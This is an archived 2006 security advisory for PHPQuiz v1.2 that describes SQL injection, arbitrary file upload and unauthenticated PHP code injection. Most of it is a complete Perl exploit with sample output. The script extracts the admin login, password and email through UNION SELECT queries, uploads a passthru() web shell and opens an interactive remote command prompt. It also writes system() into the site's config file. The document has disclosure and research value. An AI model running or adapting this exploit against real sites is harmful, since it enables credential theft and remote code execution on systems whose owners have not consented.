Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14325
HistorySep 19, 2006 - 12:00 a.m.

PHPQuiz Multiple Remote Vulnerabilites

2006-09-1900:00:00
vulners.com
44

######################################################

Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit

Vendor : PHPQuiz

webiste : http://www.phpquiz.com

Version : <= v.1.2

Severity: Critical

Author: Simo64 / simo64_at_morx_org

MorX Security Reseach Team

http://www.morx.org

http://www.morx.org/phpquiz.txt

Details :

SQL injection

#***************************

univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query

PoC : http://localhost/phpquiz/front/?what=score&amp;univers=[SQL]

http://localhost/phpquiz/front/?quiz=quiz&amp;univers=1&amp;step=1&amp;quiz_id=[SQL]

Arbitary File Upload

#**********************

vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76

74 if (($upload) && ($ok_update == "yes")) {

75

76 if(@copy($image, $path)){

77 …

$upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files

PoC Exploit :

<form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&amp;ok_update=yes&amp;path=./../img_quiz/l3ez.php&quot;&gt;

Download File<br>

<input name="image" type="file" size="20"><br>

<input type="submit" name="upload" value="Upload"><form>

phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell <?passthru($cmd);?>

we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls

PHP Code Injection

#********************

cfgphpquiz/install.php is accessible without authentification , the script is used to

save configuration setting in config.inc.php.

Impact:

any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information

such as admin password (plain text) and login

#***********************************************************************************

simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1

/-----------------------------------------------------------\

| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |

| Coded by simo64 - simo64_morx.org |

| www.morx.org |

|-----------------------------------------------------------|

| MorX Security Research Team © |

\-----------------------------------------------------------/

Connecting to www.morx.org … Connected !

[+] Injecting credentials

Sending Data …

SQL injection Succeded !

User EMail : [email protected]

User Login : admin

User Passwd : password

[+] Exec CMD by uploading a shell Connected !

Uploading shell … [OK]

Checking if successfully Uploaded … [OK]

NOW YOU CAN LAUNCH COMMANDS

simo64[at]morx.org :~$ id

uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)

simo64[at]morx.org :~$ pwd

/home/morx/public_html/phpquiz/img_quiz

simo64[at]morx.org :~$ ls

id_1.gif

id_2.gif

id_3.gif

id_4.gif

index.php

zaz.php

simo64[at]morx.org :~$ exit

#!/usr/bin/perl

use IO::Socket ;
use LWP::Simple ;

print q(

/-----------------------------------------------------------\
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
| Coded by simo64 - simo64_morx.org |

www.morx.org
MorX Security Research Team ©
\-----------------------------------------------------------/

);

sub usage(){

print "\nUsage :perl $0 siteurl /path/ userid\n";
print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n";

}

if(!@ARGV){
&usage();
exit(0)
}

$host = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$success = null ;
$injected = 0;
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)";
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/";
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/
";
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";

syswrite STDOUT , "Connecting to $host …";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n\nUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data …";

    print $sock &quot;GET $path$injectmail HTTP/1.1&#92;n&quot;;
    print $sock &quot;Host: $host&#92;n&quot;;
    print $sock &quot;Connection: Close&#92;n&#92;n&quot;;

    while&#40;$res = &lt;$sock&gt;&#41;{
            if&#40;$res =~ /anim_fleche_droite.gif&quot; border=&quot;0&quot;&gt;&amp;nbsp;&amp;quot;&#40;.*?&#41;&amp;quot;&lt;&#92;/a&gt;/&#41;{
                    $usermail = $1 ;
                    $success = &quot;ok&quot; ;
                    }
    }

if($success eq "ok") {

syswrite STDOUT , "\n\nSQL injection Succeded !\n\n";
sleep 2 ;
syswrite STDOUT , "\tUser EMail : $usermail\n";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock &quot;GET $path$injectuser HTTP/1.1&#92;n&quot;;
    print $sock &quot;Host: $host&#92;n&quot;;
    print $sock &quot;Connection: Close&#92;n&#92;n&quot;;

    while&#40;$res = &lt;$sock&gt;&#41;{
            if&#40;$res =~ /&gt;&amp;nbsp;&amp;quot;&#40;.*?&#41;&amp;quot;/&#41;{
                    $userlogin = $1 ;
                    }
    }
    syswrite STDOUT , &quot;&#92;tUser Login  : $userlogin&#92;n&quot;;

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock &quot;GET $path$injectpass HTTP/1.1&#92;n&quot;;
    print $sock &quot;Host: $host&#92;n&quot;;
    print $sock &quot;Connection: Close&#92;n&#92;n&quot;;

    while&#40;$res = &lt;$sock&gt;&#41;{
            if&#40;$res =~ /&gt;&amp;nbsp;&amp;quot;&#40;.*?&#41;&amp;quot;/&#41;{
                    $userpass = $1 ;
                    }
    }

syswrite STDOUT , "\tUser Passwd : $userpass\n\n";

} else {print "\n\nInjecting credentials Exploit Failed !\n\n";}

sleep 2;

PART2 Remote Command Execution by uploaing shell

syswrite STDOUT , "\n[+] Exec CMD by uploading a shell";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n\nUnable to connect to $host " unless($sock) ;

syswrite STDOUT , "\tConnected !\n\n";
syswrite STDOUT , "Uploading shell …";

$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"

/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="image"; filename="zaz.php"
Content-Type: text/plain

<?php
if (get_magic_quotes_gpc()){$_GET[\'cmd\']=stripslashes($_GET[\'cmd\']);}
passthru($_GET[\'cmd\']);
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d61592213049c–
';

$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./…/img_quiz/zaz.php";

$len = length $data ;

print $sock "POST $script HTTP/1.0\r\n";
print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
print $sock "Host: $host\r\n";
print $sock "Content-Length: $len\r\n";
print $sock "Connection: close\r\n\r\n";
print $sock $data;

syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded … ";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0\r\n";
print $sock "Host: $host\r\n";
print $sock "Connection: close\n\n";

while($rep = <$sock>){
if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; }
}
if($success == 1){

    print &quot;&#92;t[OK]&#92;n&#92;n&#92;t&#92;tNOW YOU CAN LAUNCH COMMANDS&#92;n&#92;n&quot;;
    
    while&#40;&#41;{
    print &quot;simo64[at]morx.org :~&#92;$ &quot;;
    chop&#40;$cmd=&lt;STDIN&gt;&#41;;
    exit&#40;&#41; if &#40;$cmd eq &#39;exit&#39;&#41;;
    $result = get&#40;&quot;http://$host&quot;.$path.&quot;img_quiz/zaz.php?cmd=$cmd&quot;&#41;;
    print $result;
    }

}
else { print "\tFailed !\n\nFile Upload Failed\n\n" }

STEP 3 Injecting PHPcode into config.inc.php file

print "\n[+] Injecting PHP Code…\n\nConnecting …";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "Connot Connect to $host !" unless($sock);

print "\tConnected !\n\nSending Data …\t";

    print $sock &quot;GET $phpinject HTTP/1.1&#92;n&quot;;
    print $sock &quot;Host: $host&#92;n&quot;;
    print $sock &quot;Content-Type: application/x-www-form-urlencoded&#92;n&quot;;
    print $sock &quot;User-Agent: MorX-Zilla&#92;n&quot;;
    print $sock &quot;Connection: Close&#92;n&#92;n&quot;;

print "\t OK\n\nChecking if code injected …";

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

    print $sock &quot;GET $injcheck HTTP/1.1&#92;n&quot;;
    print $sock &quot;Host: $host&#92;n&quot;;
    print $sock &quot;Content-Type: application/x-www-form-urlencoded&#92;n&quot;;
    print $sock &quot;User-Agent: MorX-Zilla&#92;n&quot;;
    print $sock &quot;Connection: Close&#92;n&#92;n&quot;;

while($check = <$sock>){
if($check =~ /l3fou/) { $injected = 1; }
}
if($injected == 1 ){
print "\tSucceded !\n\n\tNOW YOU ARE IN !\n\n";

while(){
print "simo\@morx.org :~\$ ";
$cmd = <STDIN>;
chop($cmd);
exit(0) if($cmd eq "exit");
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");
print $result;
}
}
else {print "\tFailed\n\nPHPCode Injection Failed !\n\n";}